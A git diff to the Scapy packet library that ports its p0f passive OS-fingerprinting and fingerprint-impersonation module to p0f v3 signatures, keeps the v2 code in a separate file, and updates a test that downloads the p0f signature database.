= p0f_getlocalsigs()[db] - if db == p0fr_kdb: - # 'K' quirk <=> RST+ACK - if pkt.payload.flags & 0x4 == 0x4: - pb = [x for x in pb if 'K' in x[5]] + if not p0fdb.get_base(): + sigs = [] else: - pb = [x for x in pb if 'K' not in x[5]] - if not pb: - raise Scapy_Exception("No match in the p0f database") - pers = pb[random.randint(0, len(pb) - 1)] + direction = "request" if tcp_type == 0x02 else "response" + sigs = p0fdb.get_sigs_by_os(direction, osgenre, osdetails) - # options (we start with options because of MSS) - # Take the options already set as "hints" to use in the new packet if we - # can. MSS, WScale and Timestamp can all be wildcarded in a signature, so - # we'll use the already-set values if they're valid integers. - orig_opts = dict(pkt.payload.options) - int_only = lambda val: val if isinstance(val, six.integer_types) else None - mss_hint = int_only(orig_opts.get('MSS')) - wscale_hint = int_only(orig_opts.get('WScale')) - ts_hint = [int_only(o) for o in orig_opts.get('Timestamp', (None, None))] + # If IPv6 packet, remove IPv4-only signatures and vice versa + sigs = [s for s in sigs if s.ip_ver == -1 or s.ip_ver == pkt.version] + if not sigs: + raise ValueError("No match in the p0f database") + sig = random.choice(sigs) - options = [] - if pers[4] != '.': - for opt in pers[4].split(','): - if opt[0] == 'M': - # MSS might have a maximum size because of window size - # specification - if pers[0][0] == 'S': - maxmss = (2**16 - 1) // int(pers[0][1:]) - else: - maxmss = (2**16 - 1) - # disregard hint if out of range - if mss_hint and not 0 <= mss_hint <= maxmss: - mss_hint = None - # If we have to randomly pick up a value, we cannot use - # scapy RandXXX() functions, because the value has to be - # set in case we need it for the window size value. That's - # why we use random.randint() - if opt[1:] == '*': - if mss_hint is not None: - options.append(('MSS', mss_hint)) - else: - options.append(('MSS', random.randint(1, maxmss))) - elif opt[1] == '%': - coef = int(opt[2:]) - if mss_hint is not None and mss_hint % coef == 0: - options.append(('MSS', mss_hint)) - else: - options.append(( - 'MSS', coef * random.randint(1, maxmss // coef))) - else: - options.append(('MSS', int(opt[1:]))) - elif opt[0] == 'W': - if wscale_hint and not 0 <= wscale_hint < 2**8: - wscale_hint = None - if opt[1:] == '*': - if wscale_hint is not None: - options.append(('WScale', wscale_hint)) - else: - options.append(('WScale', RandByte())) - elif opt[1] == '%': - coef = int(opt[2:]) - if wscale_hint is not None and wscale_hint % coef == 0: - options.append(('WScale', wscale_hint)) - else: - options.append(( - 'WScale', coef * RandNum(min=1, max=(2**8 - 1) // coef))) # noqa: E501 - else: - options.append(('WScale', int(opt[1:]))) - elif opt == 'T0': - options.append(('Timestamp', (0, 0))) - elif opt == 'T': - # Determine first timestamp. - if uptime is not None: - ts_a = uptime - elif ts_hint[0] and 0 < ts_hint[0] < 2**32: - # Note: if first ts is 0, p0f registers it as "T0" not "T", - # hence we don't want to use the hint if it was 0. - ts_a = ts_hint[0] - else: - ts_a = random.randint(120, 100 * 60 * 60 * 24 * 365) - # Determine second timestamp. - if 'T' not in pers[5]: - ts_b = 0 - elif ts_hint[1] and 0 < ts_hint[1] < 2**32: - ts_b = ts_hint[1] - else: - # FIXME: RandInt() here does not work (bug (?) in - # TCPOptionsField.m2i often raises "OverflowError: - # long int too large to convert to int" in: - # oval = struct.pack(ofmt, *oval)" - # Actually, this is enough to often raise the error: - # struct.pack('I', RandInt()) - ts_b = random.randint(1, 2**32 - 1) - options.append(('Timestamp', (ts_a, ts_b))) - elif opt == 'S': - options.append(('SAckOK', '')) - elif opt == 'N': - options.append(('NOP', None)) - elif opt == 'E': - options.append(('EOL', None)) - elif opt[0] == '?': - if int(opt[1:]) in TCPOptions[0]: - optname = TCPOptions[0][int(opt[1:])][0] - optstruct = TCPOptions[0][int(opt[1:])][1] - options.append((optname, - struct.unpack(optstruct, - RandString(struct.calcsize(optstruct))._fix()))) # noqa: E501 - else: - options.append((int(opt[1:]), '')) - # FIXME: qqP not handled - else: - warning("unhandled TCP option %s", opt) - pkt.payload.options = options - - # window size - if pers[0] == '*': - pkt.payload.window = RandShort() - elif pers[0].isdigit(): - pkt.payload.window = int(pers[0]) - elif pers[0][0] == '%': - coef = int(pers[0][1:]) - pkt.payload.window = coef * RandNum(min=1, max=(2**16 - 1) // coef) - elif pers[0][0] == 'T': - pkt.payload.window = mtu * int(pers[0][1:]) - elif pers[0][0] == 'S': - # needs MSS set - mss = [x for x in options if x[0] == 'MSS'] - if not mss: - raise Scapy_Exception("TCP window value requires MSS, and MSS option not set") # noqa: E501 - pkt.payload.window = mss[0][1] * int(pers[0][1:]) - else: - raise Scapy_Exception('Unhandled window size specification') - - # ttl - pkt.ttl = pers[1] - extrahops - # DF flag - pkt.flags |= (2 * pers[2]) - # FIXME: ss (packet size) not handled (how ? may be with D quirk - # if present) - # Quirks - if pers[5] != '.': - for qq in pers[5]: - # FIXME: not handled: P, I, X, ! - # T handled with the Timestamp option - if qq == 'Z': - pkt.id = 0 - elif qq == 'U': - pkt.payload.urgptr = RandShort() - elif qq == 'A': - pkt.payload.ack = RandInt() - elif qq == 'F': - if db == p0fo_kdb: - pkt.payload.flags |= 0x20 # U - else: - pkt.payload.flags |= random.choice([8, 32, 40]) # P/U/PU - elif qq == 'D' and db != p0fo_kdb: - pkt /= conf.raw_layer(load=RandString(random.randint(1, 10))) # XXX p0fo.fp # noqa: E501 - elif qq == 'Q': - pkt.payload.seq = pkt.payload.ack - # elif qq == '0': pkt.payload.seq = 0 - # if db == p0fr_kdb: - # '0' quirk is actually not only for p0fr.fp (see - # packet2p0f()) - if '0' in pers[5]: - pkt.payload.seq = 0 - elif pkt.payload.seq == 0: - pkt.payload.seq = RandInt() - - while pkt.underlayer: - pkt = pkt.underlayer - return pkt + if sig.ip_ver != -1 and pkt.version != sig.ip_ver: + raise ValueError("Can't convert between IPv4 and IPv6") + quirks = sig.quirks -def p0f_getlocalsigs(): - """This function returns a dictionary of signatures indexed by p0f -db (e.g., p0f_kdb, p0fa_kdb, ...) for the local TCP/IP stack. + if pkt.version == 4: + pkt.ttl = sig.ttl - extrahops + if sig.ip_opt_len != 0: + # FIXME: Non-zero IPv4 options not handled + warning("Unhandled IPv4 option field") + else: + pkt.options = [] -You need to have your firewall at least accepting the TCP packets -from/to a high port (30000 <= x <= 40000) on your loopback interface. + if "df" in quirks: + pkt.flags |= 0x02 # set DF flag + if "id+" in quirks: + if pkt.id == 0: + pkt.id = random.randint(1, 2**16 - 1) + else: + pkt.id = 0 + else: + pkt.flags &= ~(0x02) # DF flag not set + if "id-" in quirks: + pkt.id = 0 + elif pkt.id == 0: + pkt.id = random.randint(1, 2**16 - 1) + if "ecn" in quirks: + pkt.tos |= random.randint(0x01, 0x03) + pkt.flags = pkt.flags | 0x04 if "0+" in quirks else pkt.flags & ~(0x04) + else: + pkt.hlim = sig.ttl - extrahops + if "flow" in quirks: + pkt.fl = random.randint(1, 2**20 - 1) + if "ecn" in quirks: + pkt.tc |= random.randint(0x01, 0x03) -Please note that the generated signatures come from the loopback -interface and may (are likely to) be different than those generated on -"normal" interfaces.""" - pid = os.fork() - port = random.randint(30000, 40000) - if pid > 0: - # parent: sniff - result = {} + # Take the options already set as "hints" to use in the new packet if we + # can. we'll use the already-set values if they're valid integers. + def int_only(val): + return val if isinstance(val, integer_types) else None + orig_opts = dict(tcp.options) + mss_hint = int_only(orig_opts.get("MSS")) + ws_hint = int_only(orig_opts.get("WScale")) + ts_hint = [int_only(o) for o in orig_opts.get("Timestamp", (None, None))] + + options = [] + for opt in sig.olayout.split(","): + if opt == "mss": + # MSS might have a maximum size because of WIN_TYPE_MSS + if sig.win_type == WIN_TYPE_MSS: + maxmss = (2**16 - 1) // sig.win + else: + maxmss = (2**16 - 1) - def addresult(res): - # TODO: wildcard window size in some cases? and maybe some - # other values? - if res[0] not in result: - result[res[0]] = [res[1]] + if sig.mss == -1: # wildcard mss + if mss_hint and 0 <= mss_hint <= maxmss: + options.append(("MSS", mss_hint)) + else: # invalid hint, generate new value + options.append(("MSS", random.randint(1, maxmss))) + else: + options.append(("MSS", sig.mss)) + + elif opt == "ws": + if sig.wscale == -1: # wildcard wscale + maxws = 2**8 + if "exws" in quirks: # wscale > 14 + if ws_hint and 14 < ws_hint < maxws: + options.append(("WScale", ws_hint)) + else: # invalid hint, generate new value > 14 + options.append(("WScale", random.randint(15, maxws - 1))) # noqa: E501 + else: + if ws_hint and 0 <= ws_hint < maxws: + options.append(("WScale", ws_hint)) + else: # invalid hint, generate new value + options.append(("WScale", RandByte())) + else: + options.append(("WScale", sig.wscale)) + + elif opt == "ts": + ts1, ts2 = ts_hint + + if "ts1-" in quirks: # own timestamp specified as zero + ts1 = 0 + elif uptime is not None: # if specified uptime, override + ts1 = uptime + elif ts1 is None or not (0 < ts1 < 2**32): # invalid hint + ts1 = random.randint(120, 100 * 60 * 60 * 24 * 365) + + # non-zero peer timestamp on initial SYN + if "ts2+" in quirks and tcp_type == 0x02: + if ts2 is None or not (0 < ts2 < 2**32): # invalid hint + ts2 = random.randint(1, 2**32 - 1) else: - if res[1] not in result[res[0]]: - result[res[0]].append(res[1]) - # XXX could we try with a "normal" interface using other hosts - iface = conf.route.route('127.0.0.1')[0] - # each packet is seen twice: S + RA, S + SA + A + FA + A - # XXX are the packets also seen twice on non Linux systems ? - count = 14 - pl = sniff(iface=iface, filter='tcp and port ' + str(port), count=count, timeout=3) # noqa: E501 - for pkt in pl: - for elt in packet2p0f(pkt): - addresult(elt) - os.waitpid(pid, 0) - elif pid < 0: - log_runtime.error("fork error") + ts2 = 0 + options.append(("Timestamp", (ts1, ts2))) + + elif opt == "nop": + options.append(("NOP", None)) + elif opt == "sok": + options.append(("SAckOK", "")) + elif opt[:3] == "eol": + options.append(("EOL", None)) + # FIXME: opt+ quirk not handled + if "opt+" in quirks: + warning("Unhandled opt+ quirk") + elif opt == "sack": + # Randomize SAck value in range of 10 <= val <= 34 + sack_len = random.choice([10, 18, 26, 34]) - 2 + optstruct = "!%iI" % (sack_len // 4) + rand_val = RandString(struct.calcsize(optstruct))._fix() + options.append(("SAck", struct.unpack(optstruct, rand_val))) + else: + warning("Unhandled TCP option %s", opt) + tcp.options = options + + if sig.win_type == WIN_TYPE_NORMAL: + tcp.window = sig.win + elif sig.win_type == WIN_TYPE_MSS: + mss = [x for x in options if x[0] == "MSS"] + if not mss: + raise ValueError("TCP window value requires MSS, and MSS option not set") # noqa: E501 + tcp.window = mss[0][1] * sig.win + elif sig.win_type == WIN_TYPE_MOD: + tcp.window = sig.win * random.randint(1, (2**16 - 1) // sig.win) + elif sig.win_type == WIN_TYPE_MTU: + tcp.window = mtu * sig.win + elif sig.win_type == WIN_TYPE_ANY: + tcp.window = RandShort() else: - # child: send - # XXX erk - time.sleep(1) - s1 = socket.socket(socket.AF_INET, type=socket.SOCK_STREAM) - # S & RA - try: - s1.connect(('127.0.0.1', port)) - except socket.error: - pass - # S, SA, A, FA, A - s1.bind(('127.0.0.1', port)) - s1.connect(('127.0.0.1', port)) - # howto: get an RST w/o ACK packet - s1.close() - os._exit(0) - return result + warning("Unhandled window size specification") + + if "seq-" in quirks: + tcp.seq = 0 + elif tcp.seq == 0: + tcp.seq = random.randint(1, 2**32 - 1) + + if "ack+" in quirks: + tcp.flags &= ~(0x10) # ACK flag not set + if tcp.ack == 0: + tcp.ack = random.randint(1, 2**32 - 1) + elif "ack-" in quirks: + tcp.flags |= 0x10 # ACK flag set + tcp.ack = 0 + + if "uptr+" in quirks: + tcp.flags &= ~(0x020) # URG flag not set + if tcp.urgptr == 0: + tcp.urgptr = random.randint(1, 2**16 - 1) + elif "urgf+" in quirks: + tcp.flags |= 0x020 # URG flag used + + tcp.flags = tcp.flags | 0x08 if "pushf+" in quirks else tcp.flags & ~(0x08) + + if sig.pay_class: # signature has payload + if not tcp.payload: + pkt /= conf.raw_layer(load=RandString(random.randint(1, 10))) + else: + tcp.payload = NoPayload() + + return pkt diff --git a/scapy/modules/p0fv2.py b/scapy/modules/p0fv2.py new file mode 100644 index 00000000000..d6ca175eb3f --- /dev/null +++ b/scapy/modules/p0fv2.py @@ -0,0 +1,623 @@ +# This file is part of Scapy +# See http://www.secdev.org/projects/scapy for more information +# Copyright (C) Philippe Biondi +# This program is published under a GPLv2 license + +""" +Clone of p0f v2 passive OS fingerprinting +""" + +from __future__ import absolute_import +from __future__ import print_function +import time +import struct +import os +import socket +import random + +from scapy.data import KnowledgeBase, select_path +from scapy.config import conf +from scapy.compat import raw +from scapy.layers.inet import IP, TCP, TCPOptions +from scapy.packet import NoPayload, Packet +from scapy.error import warning, Scapy_Exception, log_runtime +from scapy.volatile import RandInt, RandByte, RandNum, RandShort, RandString +from scapy.sendrecv import sniff +from scapy.modules import six +from scapy.modules.six.moves import map, range +if conf.route is None: + # unused import, only to initialize conf.route + import scapy.route # noqa: F401 + +_p0fpaths = ["/etc/p0f", "/usr/share/p0f", "/opt/local"] + +conf.p0f_base = select_path(_p0fpaths, "p0f.fp") +conf.p0fa_base = select_path(_p0fpaths, "p0fa.fp") +conf.p0fr_base = select_path(_p0fpaths, "p0fr.fp") +conf.p0fo_base = select_path(_p0fpaths, "p0fo.fp") + + +############### +# p0f stuff # +############### + +# File format (according to p0f.fp) : +# +# wwww:ttt:D:ss:OOO...:QQ:OS:Details +# +# wwww - window size +# ttt - initial TTL +# D - don't fragment bit (0=unset, 1=set) +# ss - overall SYN packet size +# OOO - option value and order specification +# QQ - quirks list +# OS - OS genre +# details - OS description + +class p0fKnowledgeBase(KnowledgeBase): + def __init__(self, filename): + KnowledgeBase.__init__(self, filename) + # self.ttl_range=[255] + + def lazy_init(self): + try: + f = open(self.filename) + except IOError: + warning("Can't open base %s", self.filename) + return + try: + self.base = [] + for line in f: + if line[0] in ["#", "\n"]: + continue + line = tuple(line.split(":")) + if len(line) < 8: + continue + + def a2i(x): + if x.isdigit(): + return int(x) + return x + li = [a2i(e) for e in line[1:4]] + # if li[0] not in self.ttl_range: + # self.ttl_range.append(li[0]) + # self.ttl_range.sort() + self.base.append((line[0], li[0], li[1], li[2], line[4], + line[5], line[6], line[7][:-1])) + except Exception: + warning("Can't parse p0f database (new p0f version ?)") + self.base = None + f.close() + + +p0f_kdb, p0fa_kdb, p0fr_kdb, p0fo_kdb = None, None, None, None + + +def p0f_load_knowledgebases(): + global p0f_kdb, p0fa_kdb, p0fr_kdb, p0fo_kdb + p0f_kdb = p0fKnowledgeBase(conf.p0f_base) + p0fa_kdb = p0fKnowledgeBase(conf.p0fa_base) + p0fr_kdb = p0fKnowledgeBase(conf.p0fr_base) + p0fo_kdb = p0fKnowledgeBase(conf.p0fo_base) + + +p0f_load_knowledgebases() + + +def p0f_selectdb(flags): + # tested flags: S, R, A + if flags & 0x16 == 0x2: + # SYN + return p0f_kdb + elif flags & 0x16 == 0x12: + # SYN/ACK + return p0fa_kdb + elif flags & 0x16 in [0x4, 0x14]: + # RST RST/ACK + return p0fr_kdb + elif flags & 0x16 == 0x10: + # ACK + return p0fo_kdb + else: + return None + + +def packet2p0f(pkt): + pkt = pkt.copy() + pkt = pkt.__class__(raw(pkt)) + while pkt.haslayer(IP) and pkt.haslayer(TCP): + pkt = pkt.getlayer(IP) + if isinstance(pkt.payload, TCP): + break + pkt = pkt.payload + + if not isinstance(pkt, IP) or not isinstance(pkt.payload, TCP): + raise TypeError("Not a TCP/IP packet") + # if pkt.payload.flags & 0x7 != 0x02: #S,!F,!R + # raise TypeError("Not a SYN or SYN/ACK packet") + + db = p0f_selectdb(pkt.payload.flags) + + # t = p0f_kdb.ttl_range[:] + # t += [pkt.ttl] + # t.sort() + # ttl=t[t.index(pkt.ttl)+1] + ttl = pkt.ttl + + ss = len(pkt) + # from p0f/config.h : PACKET_BIG = 100 + if ss > 100: + if db == p0fr_kdb: + # p0fr.fp: "Packet size may be wildcarded. The meaning of + # wildcard is, however, hardcoded as 'size > + # PACKET_BIG'" + ss = '*' + else: + ss = 0 + if db == p0fo_kdb: + # p0fo.fp: "Packet size MUST be wildcarded." + ss = '*' + + ooo = "" + mss = -1 + qqT = False + qqP = False + # qqBroken = False + ilen = (pkt.payload.dataofs << 2) - 20 # from p0f.c + for option in pkt.payload.options: + ilen -= 1 + if option[0] == "MSS": + ooo += "M" + str(option[1]) + "," + mss = option[1] + # FIXME: qqBroken + ilen -= 3 + elif option[0] == "WScale": + ooo += "W" + str(option[1]) + "," + # FIXME: qqBroken + ilen -= 2 + elif option[0] == "Timestamp": + if option[1][0] == 0: + ooo += "T0," + else: + ooo += "T," + if option[1][1] != 0: + qqT = True + ilen -= 9 + elif option[0] == "SAckOK": + ooo += "S," + ilen -= 1 + elif option[0] == "NOP": + ooo += "N," + elif option[0] == "EOL": + ooo += "E," + if ilen > 0: + qqP = True + else: + if isinstance(option[0], str): + ooo += "?%i," % TCPOptions[1][option[0]] + else: + ooo += "?%i," % option[0] + # FIXME: ilen + ooo = ooo[:-1] + if ooo == "": + ooo = "." + + win = pkt.payload.window + if mss != -1: + if mss != 0 and win % mss == 0: + win = "S" + str(win / mss) + elif win % (mss + 40) == 0: + win = "T" + str(win / (mss + 40)) + win = str(win) + + qq = "" + + if db == p0fr_kdb: + if pkt.payload.flags & 0x10 == 0x10: + # p0fr.fp: "A new quirk, 'K', is introduced to denote + # RST+ACK packets" + qq += "K" + # The two next cases should also be only for p0f*r*, but although + # it's not documented (or I have not noticed), p0f seems to + # support the '0' and 'Q' quirks on any databases (or at the least + # "classical" p0f.fp). + if pkt.payload.seq == pkt.payload.ack: + # p0fr.fp: "A new quirk, 'Q', is used to denote SEQ number + # equal to ACK number." + qq += "Q" + if pkt.payload.seq == 0: + # p0fr.fp: "A new quirk, '0', is used to denote packets + # with SEQ number set to 0." + qq += "0" + if qqP: + qq += "P" + if pkt.id == 0: + qq += "Z" + if pkt.options != []: + qq += "I" + if pkt.payload.urgptr != 0: + qq += "U" + if pkt.payload.reserved != 0: + qq += "X" + if pkt.payload.ack != 0: + qq += "A" + if qqT: + qq += "T" + if db == p0fo_kdb: + if pkt.payload.flags & 0x20 != 0: + # U + # p0fo.fp: "PUSH flag is excluded from 'F' quirk checks" + qq += "F" + else: + if pkt.payload.flags & 0x28 != 0: + # U or P + qq += "F" + if db != p0fo_kdb and not isinstance(pkt.payload.payload, NoPayload): + # p0fo.fp: "'D' quirk is not checked for." + qq += "D" + # FIXME : "!" - broken options segment: not handled yet + + if qq == "": + qq = "." + + return (db, (win, ttl, pkt.flags.DF, ss, ooo, qq)) + + +def p0f_correl(x, y): + d = 0 + # wwww can be "*" or "%nn". "Tnn" and "Snn" should work fine with + # the x[0] == y[0] test. + d += (x[0] == y[0] or y[0] == "*" or (y[0][0] == "%" and x[0].isdigit() and (int(x[0]) % int(y[0][1:])) == 0)) # noqa: E501 + # ttl + d += (y[1] >= x[1] and y[1] - x[1] < 32) + for i in [2, 5]: + d += (x[i] == y[i] or y[i] == '*') + # '*' has a special meaning for ss + d += x[3] == y[3] + xopt = x[4].split(",") + yopt = y[4].split(",") + if len(xopt) == len(yopt): + same = True + for i in range(len(xopt)): + if not (xopt[i] == yopt[i] or + (len(yopt[i]) == 2 and len(xopt[i]) > 1 and + yopt[i][1] == "*" and xopt[i][0] == yopt[i][0]) or + (len(yopt[i]) > 2 and len(xopt[i]) > 1 and + yopt[i][1] == "%" and xopt[i][0] == yopt[i][0] and + int(xopt[i][1:]) % int(yopt[i][2:]) == 0)): + same = False + break + if same: + d += len(xopt) + return d + + +@conf.commands.register +def p0f(pkt): + """Passive OS fingerprinting: which OS emitted this TCP packet ? +p0f(packet) -> accuracy, [list of guesses] +""" + db, sig = packet2p0f(pkt) + if db: + pb = db.get_base() + else: + pb = [] + if not pb: + warning("p0f base empty.") + return [] + # s = len(pb[0][0]) + r = [] + max = len(sig[4].split(",")) + 5 + for b in pb: + d = p0f_correl(sig, b) + if d == max: + r.append((b[6], b[7], b[1] - pkt[IP].ttl)) + return r + + +def prnp0f(pkt): + """Calls p0f and returns a user-friendly output""" + # we should print which DB we use + try: + r = p0f(pkt) + except Exception: + return + if r == []: + r = ("UNKNOWN", "[" + ":".join(map(str, packet2p0f(pkt)[1])) + ":?:?]", None) # noqa: E501 + else: + r = r[0] + uptime = None + try: + uptime = pkt2uptime(pkt) + except Exception: + pass + if uptime == 0: + uptime = None + res = pkt.sprintf("%IP.src%:%TCP.sport% - " + r[0] + " " + r[1]) + if uptime is not None: + res += pkt.sprintf(" (up: " + str(uptime / 3600) + " hrs)\n -> %IP.dst%:%TCP.dport% (%TCP.flags%)") # noqa: E501 + else: + res += pkt.sprintf("\n -> %IP.dst%:%TCP.dport% (%TCP.flags%)") + if r[2] is not None: + res += " (distance " + str(r[2]) + ")" + print(res) + + +@conf.commands.register +def pkt2uptime(pkt, HZ=100): + """Calculate the date the machine which emitted the packet booted using TCP timestamp # noqa: E501 +pkt2uptime(pkt, [HZ=100])""" + if not isinstance(pkt, Packet): + raise TypeError("Not a TCP packet") + if isinstance(pkt, NoPayload): + raise TypeError("Not a TCP packet") + if not isinstance(pkt, TCP): + return pkt2uptime(pkt.payload) + for opt in pkt.options: + if opt[0] == "Timestamp": + # t = pkt.time - opt[1][0] * 1.0/HZ + # return time.ctime(t) + t = opt[1][0] / HZ + return t + raise TypeError("No timestamp option") + + +def p0f_impersonate(pkt, osgenre=None, osdetails=None, signature=None, + extrahops=0, mtu=1500, uptime=None): + """Modifies pkt so that p0f will think it has been sent by a +specific OS. If osdetails is None, then we randomly pick up a +personality matching osgenre. If osgenre and signature are also None, +we use a local signature (using p0f_getlocalsigs). If signature is +specified (as a tuple), we use the signature. + +For now, only TCP Syn packets are supported. +Some specifications of the p0f.fp file are not (yet) implemented.""" + pkt = pkt.copy() + # pkt = pkt.__class__(raw(pkt)) + while pkt.haslayer(IP) and pkt.haslayer(TCP): + pkt = pkt.getlayer(IP) + if isinstance(pkt.payload, TCP): + break + pkt = pkt.payload + + if not isinstance(pkt, IP) or not isinstance(pkt.payload, TCP): + raise TypeError("Not a TCP/IP packet") + + db = p0f_selectdb(pkt.payload.flags) + if osgenre: + pb = db.get_base() + if pb is None: + pb = [] + pb = [x for x in pb if x[6] == osgenre] + if osdetails: + pb = [x for x in pb if x[7] == osdetails] + elif signature: + pb = [signature] + else: + pb = p0f_getlocalsigs()[db] + if db == p0fr_kdb: + # 'K' quirk <=> RST+ACK + if pkt.payload.flags & 0x4 == 0x4: + pb = [x for x in pb if 'K' in x[5]] + else: + pb = [x for x in pb if 'K' not in x[5]] + if not pb: + raise Scapy_Exception("No match in the p0f database") + pers = pb[random.randint(0, len(pb) - 1)] + + # options (we start with options because of MSS) + # Take the options already set as "hints" to use in the new packet if we + # can. MSS, WScale and Timestamp can all be wildcarded in a signature, so + # we'll use the already-set values if they're valid integers. + orig_opts = dict(pkt.payload.options) + int_only = lambda val: val if isinstance(val, six.integer_types) else None + mss_hint = int_only(orig_opts.get('MSS')) + wscale_hint = int_only(orig_opts.get('WScale')) + ts_hint = [int_only(o) for o in orig_opts.get('Timestamp', (None, None))] + + options = [] + if pers[4] != '.': + for opt in pers[4].split(','): + if opt[0] == 'M': + # MSS might have a maximum size because of window size + # specification + if pers[0][0] == 'S': + maxmss = (2**16 - 1) // int(pers[0][1:]) + else: + maxmss = (2**16 - 1) + # disregard hint if out of range + if mss_hint and not 0 <= mss_hint <= maxmss: + mss_hint = None + # If we have to randomly pick up a value, we cannot use + # scapy RandXXX() functions, because the value has to be + # set in case we need it for the window size value. That's + # why we use random.randint() + if opt[1:] == '*': + if mss_hint is not None: + options.append(('MSS', mss_hint)) + else: + options.append(('MSS', random.randint(1, maxmss))) + elif opt[1] == '%': + coef = int(opt[2:]) + if mss_hint is not None and mss_hint % coef == 0: + options.append(('MSS', mss_hint)) + else: + options.append(( + 'MSS', coef * random.randint(1, maxmss // coef))) + else: + options.append(('MSS', int(opt[1:]))) + elif opt[0] == 'W': + if wscale_hint and not 0 <= wscale_hint < 2**8: + wscale_hint = None + if opt[1:] == '*': + if wscale_hint is not None: + options.append(('WScale', wscale_hint)) + else: + options.append(('WScale', RandByte())) + elif opt[1] == '%': + coef = int(opt[2:]) + if wscale_hint is not None and wscale_hint % coef == 0: + options.append(('WScale', wscale_hint)) + else: + options.append(( + 'WScale', coef * RandNum(min=1, max=(2**8 - 1) // coef))) # noqa: E501 + else: + options.append(('WScale', int(opt[1:]))) + elif opt == 'T0': + options.append(('Timestamp', (0, 0))) + elif opt == 'T': + # Determine first timestamp. + if uptime is not None: + ts_a = uptime + elif ts_hint[0] and 0 < ts_hint[0] < 2**32: + # Note: if first ts is 0, p0f registers it as "T0" not "T", + # hence we don't want to use the hint if it was 0. + ts_a = ts_hint[0] + else: + ts_a = random.randint(120, 100 * 60 * 60 * 24 * 365) + # Determine second timestamp. + if 'T' not in pers[5]: + ts_b = 0 + elif ts_hint[1] and 0 < ts_hint[1] < 2**32: + ts_b = ts_hint[1] + else: + # FIXME: RandInt() here does not work (bug (?) in + # TCPOptionsField.m2i often raises "OverflowError: + # long int too large to convert to int" in: + # oval = struct.pack(ofmt, *oval)" + # Actually, this is enough to often raise the error: + # struct.pack('I', RandInt()) + ts_b = random.randint(1, 2**32 - 1) + options.append(('Timestamp', (ts_a, ts_b))) + elif opt == 'S': + options.append(('SAckOK', '')) + elif opt == 'N': + options.append(('NOP', None)) + elif opt == 'E': + options.append(('EOL', None)) + elif opt[0] == '?': + if int(opt[1:]) in TCPOptions[0]: + optname = TCPOptions[0][int(opt[1:])][0] + optstruct = TCPOptions[0][int(opt[1:])][1] + options.append((optname, + struct.unpack(optstruct, + RandString(struct.calcsize(optstruct))._fix()))) # noqa: E501 + else: + options.append((int(opt[1:]), '')) + # FIXME: qqP not handled + else: + warning("unhandled TCP option %s", opt) + pkt.payload.options = options + + # window size + if pers[0] == '*': + pkt.payload.window = RandShort() + elif pers[0].isdigit(): + pkt.payload.window = int(pers[0]) + elif pers[0][0] == '%': + coef = int(pers[0][1:]) + pkt.payload.window = coef * RandNum(min=1, max=(2**16 - 1) // coef) + elif pers[0][0] == 'T': + pkt.payload.window = mtu * int(pers[0][1:]) + elif pers[0][0] == 'S': + # needs MSS set + mss = [x for x in options if x[0] == 'MSS'] + if not mss: + raise Scapy_Exception("TCP window value requires MSS, and MSS option not set") # noqa: E501 + pkt.payload.window = mss[0][1] * int(pers[0][1:]) + else: + raise Scapy_Exception('Unhandled window size specification') + + # ttl + pkt.ttl = pers[1] - extrahops + # DF flag + pkt.flags |= (2 * pers[2]) + # FIXME: ss (packet size) not handled (how ? may be with D quirk + # if present) + # Quirks + if pers[5] != '.': + for qq in pers[5]: + # FIXME: not handled: P, I, X, ! + # T handled with the Timestamp option + if qq == 'Z': + pkt.id = 0 + elif qq == 'U': + pkt.payload.urgptr = RandShort() + elif qq == 'A': + pkt.payload.ack = RandInt() + elif qq == 'F': + if db == p0fo_kdb: + pkt.payload.flags |= 0x20 # U + else: + pkt.payload.flags |= random.choice([8, 32, 40]) # P/U/PU + elif qq == 'D' and db != p0fo_kdb: + pkt /= conf.raw_layer(load=RandString(random.randint(1, 10))) # XXX p0fo.fp # noqa: E501 + elif qq == 'Q': + pkt.payload.seq = pkt.payload.ack + # elif qq == '0': pkt.payload.seq = 0 + # if db == p0fr_kdb: + # '0' quirk is actually not only for p0fr.fp (see + # packet2p0f()) + if '0' in pers[5]: + pkt.payload.seq = 0 + elif pkt.payload.seq == 0: + pkt.payload.seq = RandInt() + + while pkt.underlayer: + pkt = pkt.underlayer + return pkt + + +def p0f_getlocalsigs(): + """This function returns a dictionary of signatures indexed by p0f +db (e.g., p0f_kdb, p0fa_kdb, ...) for the local TCP/IP stack. + +You need to have your firewall at least accepting the TCP packets +from/to a high port (30000 <= x <= 40000) on your loopback interface. + +Please note that the generated signatures come from the loopback +interface and may (are likely to) be different than those generated on +"normal" interfaces.""" + pid = os.fork() + port = random.randint(30000, 40000) + if pid > 0: + # parent: sniff + result = {} + + def addresult(res): + # TODO: wildcard window size in some cases? and maybe some + # other values? + if res[0] not in result: + result[res[0]] = [res[1]] + else: + if res[1] not in result[res[0]]: + result[res[0]].append(res[1]) + # XXX could we try with a "normal" interface using other hosts + iface = conf.route.route('127.0.0.1')[0] + # each packet is seen twice: S + RA, S + SA + A + FA + A + # XXX are the packets also seen twice on non Linux systems ? + count = 14 + pl = sniff(iface=iface, filter='tcp and port ' + str(port), count=count, timeout=3) # noqa: E501 + for pkt in pl: + for elt in packet2p0f(pkt): + addresult(elt) + os.waitpid(pid, 0) + elif pid < 0: + log_runtime.error("fork error") + else: + # child: send + # XXX erk + time.sleep(1) + s1 = socket.socket(socket.AF_INET, type=socket.SOCK_STREAM) + # S & RA + try: + s1.connect(('127.0.0.1', port)) + except socket.error: + pass + # S, SA, A, FA, A + s1.bind(('127.0.0.1', port)) + s1.connect(('127.0.0.1', port)) + # howto: get an RST w/o ACK packet + s1.close() + os._exit(0) + return result diff --git a/test/p0f.uts b/test/p0f.uts index 628163f4258..dee6745862b 100644 --- a/test/p0f.uts +++ b/test/p0f.uts @@ -2,9 +2,6 @@ ~ p0f - -############ -############ + Basic p0f module tests = Module loading @@ -13,99 +10,104 @@ load_module('p0f') = Fetch database ~ netaccess -from __future__ import print_function try: from urllib.request import urlopen except ImportError: from urllib2 import urlopen -def _load_database(file): - for i in range(10): - try: - open(file, 'wb').write(urlopen('https://raw.githubusercontent.com/p0f/p0f/4b4d1f384abebbb9b1b25b8f3c6df5ad7ab365f7/' + file).read()) - break - except: - raise - pass +for i in range(10): + try: + open("p0f.fp", 'wb').write(urlopen('https://raw.githubusercontent.com/p0f/p0f/e8b924ae7fa099a3a5fe7def0ce3e397fd9a7137/p0f.fp').read()) + break + except: + raise -_load_database("p0f.fp") conf.p0f_base = "p0f.fp" -_load_database("p0fa.fp") -conf.p0fa_base = "p0fa.fp" 